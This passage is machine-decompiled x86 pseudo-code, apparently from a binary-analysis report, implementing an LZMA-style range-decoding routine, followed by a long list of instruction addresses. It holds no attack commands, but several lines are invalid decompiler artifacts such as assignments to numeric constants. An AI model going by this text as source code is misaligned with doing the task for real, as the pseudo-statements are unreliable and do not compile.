								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407175
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00000000
                                                                                              0x0040743e
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x004070bf
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x00000000
                                                                                              0x004075f6
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x004073c8
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00000000
                                                                                              0x0040753b
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
